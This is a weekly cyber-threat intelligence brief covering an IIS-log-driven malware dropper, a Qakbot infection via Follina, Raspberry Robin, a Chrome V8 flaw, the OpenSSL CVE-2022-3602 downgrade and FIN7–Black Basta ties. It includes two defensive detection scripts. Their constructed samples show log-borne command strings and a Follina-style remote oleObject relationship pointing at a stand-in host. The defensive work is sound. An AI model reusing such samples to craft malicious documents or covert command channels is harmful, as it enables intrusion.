Cyber Intel Brief: Oct 27 – Nov 3, 2022

Malware

IIS Logs Used to Execute Commands to Install Malware

Impacted Industries: All

What You Need To Know:

Symantec has discovered a previously unknown dropper that reads the HTTP requests logged by an Internet Information Services (IIS) server and treats them as commands to drop additional malware, including a publicly available backdoor and a previously unknown one. The operator's requests carry three specific strings that do not normally appear in IIS log files; the dropper parses the log for those strings and acts on the surrounding request. The dropped malware is saved as .ashx files to an arbitrary folder named in an HTTP request parameter.

Analyst Note: The threat actors likely selected the organization because it was running a misconfigured or vulnerable IIS server. One of the backdoors is a webshell that acts as a SOCKS proxy: it opens a TCP connection to another host behind the firewall on the client's behalf and relays traffic between the two. Because the dropper takes its instructions from the web server's own log, the attacker's requests do not need to succeed or reach a real resource; IIS records them regardless, so the commands remain visible to anyone who reviews the logs. Given how broad the threat landscape is, the threat actors have likely employed, or will employ, other malware besides what Symantec detailed, and additional HTTP request commands may exist.
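A log-hunting routine for the technique described above, added here as an example (it is not Symantec's code and does not reproduce the dropper). It parses the IIS W3C `#Fields` directive so column order is not hard-coded, then flags requests that carry watchlist marker strings, reference an .ashx handler, or embed a Windows path in the query. The marker strings and the sample log are constructed for this example: the report says the operator used three strings that do not normally appear in IIS logs but does not name them, so `MARKERS` is a placeholder to be replaced with your own indicators.

```python
"""Hunt IIS W3C extended logs for requests that look like log-borne commands.

Added example (not Symantec's code or the malware's). The marker strings are
hypothetical placeholders; the sample log below is constructed, not a capture.
"""
import re
from dataclasses import dataclass

# Hypothetical markers; replace with the strings from your own intel feed.
MARKERS = ("CMDSTART", "EXAMPLECMD", "EXAMPLEOP")

ASHX_RE = re.compile(r"\.ashx\b", re.IGNORECASE)
WINPATH_RE = re.compile(r"[A-Za-z]:\\")  # e.g. C:\inetpub\...

# Constructed sample log. The last two requests are the suspicious ones: a 404
# is still logged, so the dropper can read the "command" even though the
# requested resource does not exist.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2022-10-28 09:12:01 10.0.0.5 GET /index.html - 443 203.0.113.7 Mozilla/5.0 200
2022-10-28 09:12:09 10.0.0.5 GET /api/status id=42 443 203.0.113.7 Mozilla/5.0 200
2022-10-28 09:13:44 10.0.0.5 GET /healthz - 80 198.51.100.9 curl/7.81 200
2022-10-28 09:15:02 10.0.0.5 GET /favicon.ico CMDSTART..EXAMPLECMD..path=C:\inetpub\wwwroot\x\z.ashx 443 198.51.100.23 Mozilla/5.0 404
2022-10-28 09:15:03 10.0.0.5 GET /.well-known/x CMDSTART..EXAMPLEOP.. 443 198.51.100.23 Mozilla/5.0 404
"""


@dataclass
class Finding:
    line_no: int
    client_ip: str
    uri_stem: str
    uri_query: str
    reasons: list


def parse_w3c(text):
    """Yield (line_no, {field: value}) records, honoring every #Fields directive."""
    fields = None
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(None, 1)[1].split()
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Date, ...)
        if fields is None:
            raise ValueError(f"line {line_no}: data before any #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed record; skip rather than misalign columns
        yield line_no, dict(zip(fields, values))


def hunt(text, markers=MARKERS):
    """Return a Finding for every record whose stem or query looks like a log-borne command."""
    findings = []
    for line_no, rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "")
        haystack = f"{stem} {query}"
        reasons = [f"marker:{m}" for m in markers if m in haystack]
        if ASHX_RE.search(haystack):
            reasons.append("ashx-in-request")
        if WINPATH_RE.search(haystack):
            reasons.append("windows-path-in-request")
        if reasons:
            findings.append(Finding(line_no, rec.get("c-ip", "?"), stem, query, reasons))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"line {f.line_no} {f.client_ip} {f.uri_stem} {f.uri_query} -> {', '.join(f.reasons)}")
```

Run it against the files under the IIS log directory (by default `%SystemDrive%\inetpub\logs\LogFiles`); the `.ashx` and Windows-path heuristics stay useful even when the operator rotates the marker strings, because the page's description of the dropper implies the request must carry a drop path either way.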


Malware

Qakbot Malware Infection Analysis

Impacted Industries: All

What You Need To Know:

The DFIR Report details a recent Qakbot infection in which the threat actor delivered a malicious Word document, likely as a reply within a hijacked email thread, that exploited CVE-2022-30190 (Follina). The threat actor employed several techniques and legitimate tools as part of the infection chain.

Analyst Note: Ransomware threat actors have been observed using Qakbot (QBot) as an initial access vector for their ransomware operations. The DFIR Report assessed that the threat actors likely used thread-hijacked emails, and the malicious Word document was in the OOXML format, which stores its component files and folders in a ZIP archive. These factors could have allowed the emails to bypass email security solutions. The threat actors will likely employ the same techniques and tools in future campaigns, though they may alter the infection chain and tooling depending on the target and environment.
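Because an OOXML document is a ZIP, the parts that tell Word to fetch something from outside the package can be inspected statically, before the file is ever opened. The scanner below is an added example (not The DFIR Report's tooling): it walks every `.rels` part in a `.docx` and flags relationships that are external and not plain hyperlinks, which is where a Follina document's `oleObject` pointing at an attacker URL, or a direct `ms-msdt:` URI, shows up. The two sample documents are constructed in memory by `build_docx`; the remote host in the Follina-style sample is a documentation address, not a real indicator.

```python
"""Triage a .docx for external relationships that can pull remote content.

Added example, not The DFIR Report's tooling. The sample documents are
constructed here; only the word/_rels/document.xml.rels part matters to the scan.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = f"{{{RELS_NS}}}Relationship"


@dataclass
class Suspicious:
    part: str       # .rels part inside the ZIP
    rel_id: str
    rel_type: str   # last path segment of the relationship Type URI
    target: str
    why: str


def scan_docx(data: bytes):
    """Return every relationship in the package that looks like a remote-content hook."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                findings.append(Suspicious(name, "", "", "", "unparseable .rels part"))
                continue
            for rel in root.iter(REL_TAG):
                target = rel.get("Target", "")
                mode = rel.get("TargetMode", "Internal")
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                rel_id = rel.get("Id", "")
                if target.lower().startswith("ms-msdt:"):
                    why = "ms-msdt: URI (CVE-2022-30190 trigger)"
                elif mode == "External" and rel_type == "oleObject":
                    why = "external OLE object relationship"
                elif mode == "External" and rel_type != "hyperlink":
                    why = f"external {rel_type} relationship"  # e.g. attachedTemplate
                else:
                    continue
                findings.append(Suspicious(name, rel_id, rel_type, target, why))
    return findings


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal, constructed .docx around the given document.xml.rels content."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>
</Relationships>"""

# Constructed Follina-style rels: an OLE object whose target is a remote page.
# 198.51.100.50 is a documentation address, not a real indicator.
FOLLINA_RELS = BENIGN_RELS.replace(
    "</Relationships>",
    '  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
    'Target="http://198.51.100.50/stage.html!" TargetMode="External"/>\n</Relationships>')

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("follina-style", FOLLINA_RELS)):
        hits = scan_docx(build_docx(rels))
        print(label, "->", [(h.rel_id, h.rel_type, h.why) for h in hits] or "clean")
```

The third branch is deliberately broad: an external `attachedTemplate` relationship (remote template injection) is flagged by the same rule, so the check covers the general OOXML remote-content pattern rather than only the Follina instance on this page. Feed real attachments through `scan_docx(open(path, "rb").read())` at the mail gateway or in the sandbox pre-filter.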


Malware

Fauppod Malware Creates Raspberry Robin

Impacted Industries: All

What You Need To Know:

Microsoft identified heavily obfuscated DLL samples on hosts infected with Raspberry Robin or Fauppod malware. While analyzing them, Microsoft noted that several created LNK files on external USB drives. Microsoft currently assesses that these DLLs are responsible for writing Raspberry Robin LNK files to USB drives, and that the Fauppod samples are now the earliest known point in the attack chain for propagating Raspberry Robin infections to targets.

Analyst Note: The threat actors behind the Fauppod malware likely use Raspberry Robin to spread the infection to additional targets indiscriminately. Evidence exists that links the development of Raspberry Robin to EvilCorp. It is therefore also possible that Fauppod, and by extension Raspberry Robin, is part of a Loader-as-a-Service potentially operated by EvilCorp. According to Microsoft, nearly 3,000 devices in almost 1,000 organizations have seen at least one Raspberry Robin payload-related Microsoft Defender alert in the last 30 days. The threat groups and malware deployed after Fauppod and Raspberry Robin will likely expand as the number of infected devices grows.


Exploited Vulnerabilities

CISA Adds 1 CVE to its Known Exploited Vulnerabilities Catalog

Impacted Industries: All

What You Need To Know:

Based on evidence of active exploitation, CISA has added one vulnerability, CVE-2022-3723, to its Known Exploited Vulnerabilities Catalog. The flaw is a type confusion in the V8 JavaScript engine in Google Chrome before 107.0.5304.87; a remote attacker could use a crafted HTML page to trigger heap corruption in the browser.

Analyst Note: Exploitation of public-facing applications is routinely reported as one of the top initial access vectors by multiple sources. This vulnerability, however, sits in the browser, so the delivery path is a crafted web page a user is lured or redirected to rather than an exposed server. Threat actors will likely ramp up exploitation of the newly listed vulnerability within the next two weeks, although we cannot rule out the possibility that they switch to other tactics and techniques to gain initial access. We base this assessment on CISA documenting the vulnerability in its Known Exploited Vulnerabilities Catalog and on the likelihood that organizations will prioritize remediation, which makes unpatched browsers a shrinking window for the attacker.


Vulnerabilities

Critical OpenSSL Vulnerability Downgraded to High

Impacted Industries: All

What You Need To Know:

The OpenSSL Project has released details of CVE-2022-3602 and downgraded it to high severity; its October 25 prenotification had described a critical fix for OpenSSL 3.0.0 through 3.0.6. The fix ships in OpenSSL 3.0.7, and the 1.1.1 and 1.0.2 branches are not affected. Threat actors could exploit the vulnerability by sending an X.509 certificate containing a specially crafted email address to a vulnerable client or server. However, the vulnerable code runs after certificate chain verification, so exploitation requires either that a certificate authority signed the malicious certificate or that the application continues certificate verification despite failing to construct a path to a trusted issuer.

Analyst Note: OpenSSL downgraded the severity rating because, on further analysis, the bug no longer met the project's critical criterion that “remote code execution is considered likely in common situations.” Threat actors will likely develop exploit code for the vulnerability, but widespread exploitation is not expected: the overflow writes only four attacker-controlled bytes onto the stack, and on many modern platforms stack overflow protections turn that into a crash rather than code execution. On some Linux distributions the overwritten bytes land in unused stack space, so the overflow has no observable effect at all. The practical check is the version string reported by `openssl version` (and by any application that statically links its own copy): anything from 3.0.0 through 3.0.6 needs 3.0.7.


Ransomware

Are FIN7 and Black Basta Working Together?

Impacted Industries: All

What You Need To Know:

SentinelOne discovered a custom defense-impairment tool, packed with a previously unknown packer, used exclusively in Black Basta incidents. The same packer was also used on a backdoor that FIN7 uses. Based on this and several other pieces of evidence detailed in its report, SentinelOne assesses it highly likely that the Black Basta ransomware operation has ties to FIN7.

Analyst Note: According to SentinelOne's research, Black Basta operators develop and maintain their own toolkit and either work without affiliates or collaborate with only a limited, trusted set of them. SentinelOne notes that Black Basta operators compromised over 90 organizations between April and September 2022. Because relatively few operators, one of which may be FIN7, are behind Black Basta incidents, they will likely reuse the TTPs, tools, and other indicators detailed by SentinelOne in future campaigns.


What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team's estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not happen. Terms like “might” reflect situations where we are unable to assess the likelihood, usually because relevant information is lacking, sketchy, or fragmented. Terms like “we can't dismiss,” “we can't rule out,” and “we can't discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.
